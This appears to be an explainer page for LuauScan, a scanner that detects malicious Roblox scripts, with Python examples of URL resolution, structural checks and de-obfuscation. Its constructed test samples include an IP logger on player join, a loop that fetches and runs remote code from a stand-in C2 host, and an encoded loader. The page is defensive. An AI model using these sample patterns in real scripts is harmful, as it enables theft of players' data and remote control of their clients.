How LuauScan Works

LuauScan exists for one reason: to protect Roblox players from malicious scripts. Every day, people across the Roblox community paste and run scripts they found on script hubs, in Discord servers, or through executors — and a lot of those scripts hide something nasty underneath. IP loggers that harvest your address the moment you join. RATs that quietly take remote control. Webhook grabbers that ship your data straight to an attacker. LuauScan is the VirusTotal for Roblox scripts: paste a script, a loader, or a link, and it tells you what that script actually does before you run it.

Here's what happens between the moment you hit scan and the report you get back.

1. It figures out what you gave it

Roblox scripts get shared in a lot of shapes. You might paste raw Luau, a one-line loadstring(game:HttpGet(...)) loader, a raw GitHub or Pastebin link, or a full executor script. LuauScan detects which one it is automatically. If it's a loader or a URL, it fetches the actual script the loader would pull into your Roblox game — because the danger is never in the loader line, it's in the code hiding behind it.

That fetch is done safely. LuauScan validates where every link actually points, refuses to touch internal or private addresses, and follows redirects carefully, so resolving a Roblox script link can never be turned into an attack on the service itself. Every script it pulls is fingerprinted with a SHA-256 hash, so if a script has been seen before, you get the existing analysis instantly.

Because Roblox loaders often point at links the uploader controls, LuauScan is honest about a key fact: it analyzes what a URL served at the moment you scanned it. A script host can swap the file afterward. So loader reports are stamped with the exact content hash and time, and if you re-scan a link and it now serves different code than before, LuauScan flags that change — that's often the first sign of a Roblox script that was clean when it went up and weaponized later.
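As an added illustration of the fetch path described above (example code written for this page, not LuauScan's own implementation), the resolver below checks every hop of a loader URL against non-public address ranges before fetching it, fingerprints the body with SHA-256, and flags a changed hash on re-scan. The DNS and HTTP stand-ins are constructed; the `example.com` hosts and the IP addresses are placeholders.

```python
import hashlib
import ipaddress
from urllib.parse import urlparse

MAX_REDIRECTS = 5

def refusal_reason(url, resolve):
    """Why a URL must not be fetched, or None if it may be. resolve(hostname)
    returns an IP string; it is injected so the check runs offline."""
    parts = urlparse(url)
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return "unsupported URL: " + url
    ip = resolve(parts.hostname)
    # is_global is False for loopback, RFC 1918, link-local (cloud metadata) etc.
    if ip is None or not ipaddress.ip_address(ip).is_global:
        return "non-public address %s for %s" % (ip, parts.hostname)
    return None

def resolve_loader(url, resolve, fetch):
    """Follow redirects one hop at a time, re-validating every hop, then
    fingerprint the body. fetch(url) -> (status, location, body_bytes)."""
    chain = []
    for _ in range(MAX_REDIRECTS + 1):
        reason = refusal_reason(url, resolve)
        if reason:
            return {"refused": reason, "chain": chain}
        chain.append(url)
        status, location, body = fetch(url)
        if status in (301, 302, 303, 307, 308) and location:
            url = location          # checked again at the top of the loop
            continue
        return {"final_url": url, "chain": chain, "body": body,
                "sha256": hashlib.sha256(body).hexdigest()}
    return {"refused": "too many redirects", "chain": chain}

def content_changed(previous_sha256, report):
    # a link serving different bytes than at the last scan is itself a signal
    return previous_sha256 != report.get("sha256")
# Constructed stand-ins for DNS and HTTP so the example runs offline.
FAKE_DNS = {"scripts.example.com": "8.8.8.8",   # well-known public address as a stand-in
            "evil.example.com": "127.0.0.1", "metadata.example.com": "169.254.169.254"}
FAKE_HTTP = {
    "https://scripts.example.com/loader.lua": (302, "https://scripts.example.com/real.lua", b""),
    "https://scripts.example.com/real.lua": (200, None, b"print('the real script')"),
    "https://scripts.example.com/hop.lua": (302, "http://evil.example.com/admin", b""),
}

def scan(url):
    return resolve_loader(url, FAKE_DNS.get, FAKE_HTTP.get)
```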

2. It reads the script the way Roblox does

Roblox doesn't run plain Lua — it runs Luau, its own dialect with syntax that ordinary Lua parsers choke on. LuauScan parses real Luau, exactly as Roblox understands it, turning the script into a full structural map of every function, call, and value. Guessing with keyword searches isn't good enough for a security tool, so LuauScan works from the real structure of the code. If a script is so broken or hostile it can't be parsed at all, that itself is treated as a warning sign — never quietly ignored.

3. It looks for the behaviors that hurt Roblox players

With the script mapped out, LuauScan runs it past a battery of checks built specifically around how malicious Roblox scripts behave:

  • IP loggers and grabbers: requests to known logger services, or any outbound call fired every time a player joins, which is how attackers mass-harvest the IPs of everyone in a Roblox game.
  • RATs and command-and-control: a script that repeatedly fetches code from a server and executes it in a loop, giving an attacker ongoing remote control over what your Roblox client runs.
  • Data exfiltration: Discord webhooks and unknown outbound endpoints that ship information out of your Roblox session.
  • Roblox service and remote usage: which Roblox services the script touches (HttpService, Players, TeleportService, MarketplaceService, and so on) and every RemoteEvent or RemoteFunction it fires, so you can see how it reaches into the game.
  • Auth and whitelist services: many legitimate paid Roblox scripts sit behind key systems; LuauScan recognizes these and marks them as informational, while still noting that they phone home and can serve different code to different users.

Unknown destinations are never waved away. If a Roblox script contacts a server LuauScan doesn't recognize, that's surfaced as a signal — because today's unknown host is tomorrow's logger.
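An added example (not LuauScan's code) of the kind of structural check this step describes: rather than grepping for `HttpGet`, it tracks Luau block nesting so that an outbound call inside a `PlayerAdded` handler is reported as the join-time logger pattern and a `loadstring` of fetched code inside a `while` loop as the RAT-loop pattern. The sample script and its hostnames are constructed placeholders.

```python
import re
# Constructed sample in the shape of a malicious Roblox script (not a real one).
SAMPLE = """\
local HttpService = game:GetService("HttpService")
game.Players.PlayerAdded:Connect(function(player)
    HttpService:PostAsync("https://log.example.com/ip", player.Name)
end)
while true do
    loadstring(game:HttpGet("https://c2.example.com/cmd"))()
    task.wait(30)
end
if getgenv().key then print("ok") elseif true then print("no") end
"""
STRINGS = re.compile(r'"[^"\n]*"|\'[^\'\n]*\'')   # literals are blanked before scanning
COMMENT = re.compile(r"--[^\n]*")
OUTBOUND = re.compile(r"\b(?:HttpGet|HttpPost|HttpService:(?:Get|Post|Request)Async)\s*\(")
LOOP_HEAD = re.compile(r"\b(?:while|for)\b")
JOIN_HOOK = re.compile(r"PlayerAdded\s*:\s*Connect\s*\(")
KEYWORD = re.compile(r"\b[a-z]+\b")
SIGNAL_JOIN = "outbound call fires on every player join (IP logger pattern)"
SIGNAL_RAT = "fetches and executes code in a loop (RAT / C2 pattern)"
SIGNAL_LOADER = "fetches and executes remote code once (loader, informational)"
SIGNAL_OUTBOUND = "outbound call, check the destination"
def analyze(src):
    """Track Luau block nesting line by line and tag each outbound call with its context."""
    src = COMMENT.sub("", STRINGS.sub('""', src))
    stack, findings, skip_then = [], [], False
    for lineno, line in enumerate(src.splitlines(), 1):
        if OUTBOUND.search(line):
            executes = "loadstring(" in line
            signal = (SIGNAL_JOIN if "join" in stack else
                      SIGNAL_RAT if "loop" in stack and executes else
                      SIGNAL_LOADER if executes else SIGNAL_OUTBOUND)
            findings.append({"line": lineno, "context": list(stack), "signal": signal})
        loop_head, join_hook = LOOP_HEAD.search(line), JOIN_HOOK.search(line)
        for kw in KEYWORD.findall(line):
            if kw == "elseif":
                skip_then = True            # its `then` continues the open `if`
            elif kw == "then" and skip_then:
                skip_then = False
            elif kw == "then":
                stack.append("if")
            elif kw == "do":
                stack.append("loop" if loop_head else "block")
            elif kw == "function":
                stack.append("join" if join_hook else "function")
            elif kw == "end" and stack:
                stack.pop()
    return findings
```

This is a line-oriented approximation of what a real Luau parse provides: it assumes one statement per line and no block keywords inside multi-line strings, which the parser-based approach described above does not need to assume.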

4. It sees through obfuscation

A huge amount of dangerous Roblox code is obfuscated — scrambled so you can't read what it does. But obfuscation on its own isn't proof of malice: plenty of legitimate Roblox script developers obfuscate their work to stop it being stolen or resold. So LuauScan treats obfuscation as neutral and focuses on what the code actually does underneath.

It de-obfuscates in two ways. First, statically: it decodes hidden strings, unpacks encoded byte tables, and peels back nested loadstring layers to recover the real script without ever running it — so a Roblox logger URL hidden inside a string.char blob gets pulled straight out into the open. Where a payload only assembles itself at the last second, the static pass can't reach it, which is where the next stage comes in.
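An added example (not LuauScan's implementation) of the static pass just described: it unwraps a byte-table `loadstring` layer, decodes `string.char` blobs into literals, joins concatenated literals and pulls the recovered URL into the open. The loader fixture and the `log.example.com` host are constructed placeholders.

```python
import re
# Encodings this static pass unwinds; the patterns are this example's own.
BYTE_TABLE = re.compile(r"string\.char\s*\(\s*(?:table\.)?unpack\s*\(\s*\{([\d\s,]*)\}\s*\)\s*\)")
CHAR_CALL = re.compile(r"string\.char\s*\(\s*([\d\s,]+)\)")
CONCAT = re.compile(r'"([^"\\]*)"\s*\.\.\s*"([^"\\]*)"')
LOADSTRING = re.compile(r'loadstring\s*\(\s*"((?:\\.|[^"\\])*)"\s*\)\s*\(\s*\)')
URL = re.compile(r"https?://[^\s\"'<>()]+")

def decode_bytes(csv):
    return "".join(chr(int(n)) for n in csv.split(",") if n.strip())

def lua_quote(s):
    """Re-emit a decoded string as a Lua literal with quotes, backslashes, newlines escaped."""
    return '"' + s.replace("\\", "\\\\").replace('"', '\\"').replace("\n", "\\n") + '"'

def lua_unquote(body):
    return re.sub(r"\\(.)", lambda m: "\n" if m.group(1) == "n" else m.group(1), body)

def deobfuscate(src, max_passes=20):
    """Repeat until nothing changes: unwrap loadstring("...")() layers, turn byte
    tables and string.char calls into literals, join adjacent literals.
    Returns (recovered source, number of passes that changed something)."""
    passes = 0
    while passes < max_passes:
        out = BYTE_TABLE.sub(lambda m: lua_quote(decode_bytes(m.group(1))), src)
        out = LOADSTRING.sub(lambda m: lua_unquote(m.group(1)), out)
        out = CHAR_CALL.sub(lambda m: lua_quote(decode_bytes(m.group(1))), out)
        out = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', out)
        if out == src:
            break
        src, passes = out, passes + 1
    return src, passes

def find_urls(src):
    return URL.findall(src)

def byte_table_loader(plain):
    """Constructed fixture builder: wraps a payload the way script-hub loaders often do."""
    return "loadstring(string.char(unpack({%s})))()" % ",".join(str(ord(c)) for c in plain)

# Constructed sample: the payload fetches and runs code from a URL assembled
# from two string.char blobs ("https://" .. "log.example.com/ip", a placeholder host).
INNER = ("loadstring(game:HttpGet(string.char(104,116,116,112,115,58,47,47) .. "
         "string.char(108,111,103,46,101,120,97,109,112,108,101,46,99,111,109,47,105,112)))()")
SAMPLE = byte_table_loader(INNER)
```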

5. It runs the script — safely — to catch what hides at rest

This is what sets LuauScan apart from a simple code reader. Some malicious Roblox scripts only reveal their real target when they run — decrypting a logger URL with a key computed on the fly, or building a webhook address piece by piece. You can't see that by reading; you have to watch it happen.

So LuauScan runs the script in a sealed sandbox: a real Luau environment with no network and no filesystem — none of the things a malicious Roblox script needs to actually do harm. Every dangerous function is replaced with a harmless stand-in that records what the script tried to do instead of letting it happen. When the script decrypts its logger URL and tries to send your data, the sandbox writes down the real address and hands back nothing. The script reveals itself; nobody gets hurt. Anything it uncovers at runtime is run back through the same threat checks, so a logger that was invisible at rest gets caught the moment it surfaces.

The sandbox is strictly contained — a runaway or malicious Roblox script that tries to loop forever is shut down automatically, and the service stays healthy. And when a script genuinely can't be fully run, LuauScan says so plainly and marks the dynamic analysis as incomplete. It never pretends an unfinished scan is a clean one.

6. It gives you an honest verdict

Everything above rolls up into a clear report: a risk score, a plain-language explanation of what the Roblox script does, every service and remote it uses, every endpoint it contacts, the de-obfuscated source where recoverable, and a breakdown of exactly which checks fired and why. The risk is driven by real behavior — a logger, a RAT loop, an exfil call — not by superficial things like a script simply being a loader or being obfuscated, both of which are completely normal in the Roblox world.

What LuauScan does not claim

This part matters, because a security tool that overpromises is worse than none at all. LuauScan detects threats — it does not guarantee safety. No scanner can, and any tool that tells you a Roblox script is “100% safe” is lying to you. Malicious scripts can be written to detect a sandbox and stay quiet, to trigger only later, or to pull their real payload fresh from a server after you've scanned. Some harm — a backdoor that quietly hands one account admin powers in a Roblox game — looks like completely normal code and can't be spotted by any automated tool.

So LuauScan reports what it found: “no malicious indicators detected,” never “safe.” It catches the overwhelming majority of the real IP loggers, RATs, and grabbers circulating in the Roblox community, it shows its work, and it's honest about its limits. Used that way — as a strong signal, not a guarantee — it's one of the best defenses a Roblox player has against getting their account or their data stolen by a script they were about to trust.
